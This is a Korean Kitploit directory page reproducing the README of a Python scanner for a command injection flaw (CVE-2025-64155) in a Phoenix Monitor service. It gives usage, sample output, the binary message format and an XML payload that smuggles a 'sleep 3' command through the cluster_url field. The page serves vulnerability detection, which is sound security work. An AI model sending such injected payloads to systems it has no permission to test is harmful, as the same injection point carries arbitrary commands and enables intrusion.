Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-64155-hunter — CVE-2025-64155-hunter | Kitploit
도구/GitHubGitHub/purehate/cve-2025-64155-hunter
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubpurehate/cve-2025-64155-hunter

CVE-2025-64155-hunter

CVE-2025-64155-hunter

저장소 보기
16개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-64155 스캐너

Phoenix Monitor 서비스에서 명령 삽입 취약점(CVE-2025-64155)을 탐지하는 Python 스캐너입니다.

설명

CVE-2025-64155는 Phoenix Monitor 서비스의 명령 삽입 취약점으로, handleStorageRequest 명령(명령 ID: 1075724911)의 cluster_url 매개변수를 통해 원격 코드 실행이 가능합니다.

이 취약점은 cluster_url 필드의 사용자 제어 입력이 적절한 정화 없이 셸 명령에 전달될 때 발생하며, 셸 메타 문자를 통한 명령 삽입이 가능합니다.

이 스캐너는 Horizon3AI의 익스플로잇 연구를 기반으로 합니다.

기능

  • 시간 기반 탐지: 안전하고 비파괴적인 시간 기반 탐지 방법 사용
  • SSL/TLS 지원: 인증서 검증 우회로 SSL 연결 처리
  • 상세 모드: 디버깅을 위한 상세 출력
  • 서비스 확인: 취약점 테스트 없이 서비스 접근 가능 여부를 확인하는 옵션

요구 사항

  • Python 3.6+
  • 표준 라이브러리만 필요 (외부 종속성 없음)

사용법

기본 스캔

root@kitploit:~
python3 scanner.py -t <target_ip>

고급 옵션

root@kitploit:~
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900

# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v

# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15

# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only

명령줄 인수

  • -t, --target: 대상 IP 주소 또는 호스트 이름 (필수)
  • -p, --port: Phoenix Monitor 서비스 포트 (기본값: 7900)
  • --timeout: 연결 제한 시간(초) (기본값: 10)
  • -v, --verbose: 상세 출력 활성화
  • --check-only: 서비스 접근 가능 여부만 확인

작동 방식

스캐너는 시간 기반 탐지 방법을 사용합니다:

  1. SSL/TLS를 통해 Phoenix Monitor 서비스에 연결
  2. cluster_url 필드에 sleep 3가 포함된 악성 페이로드와 함께 handleStorageRequest 명령 전송
  3. 응답 시간 측정
  4. 응답이 약 3초 지연되면 대상이 취약할 가능성이 높음 (명령 실행됨)

이 방법은 안전하고 비파괴적입니다. 유해한 명령을 실행하지 않으며, 탐지 목적으로 무해한 sleep 명령만 실행합니다.

출력 예시

취약한 대상

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds

============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)

취약하지 않은 대상

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds

============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable

기술 세부 사항

메시지 형식

스캐너는 다음 구조의 바이너리 메시지를 전송합니다:

  • [4 bytes] 메시지 길이 (156)
  • [4 bytes] 페이로드 길이
  • [4 bytes] 명령 ID (1075724911 = 0x4018006F = handleStorageRequest)
  • [4 bytes] 패딩/플래그 (0)
  • [가변] XML 페이로드

페이로드 구조

XML 페이로드는 cluster_url 필드에 명령 삽입을 포함합니다:

root@kitploit:~
<TEST_STORAGE type="elastic">
    <cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
    ...
</TEST_STORAGE>

면책 조항

이 도구는 승인된 보안 테스트 및 연구 목적으로만 사용됩니다. 소유하고 있거나 테스트할 명시적 권한이 있는 시스템에서만 이 도구를 사용하십시오. 컴퓨터 시스템에 대한 무단 접근은 불법입니다.

라이선스

MIT 라이선스 - 자세한 내용은 LICENSE 파일을 참조하십시오.

도구 다운로드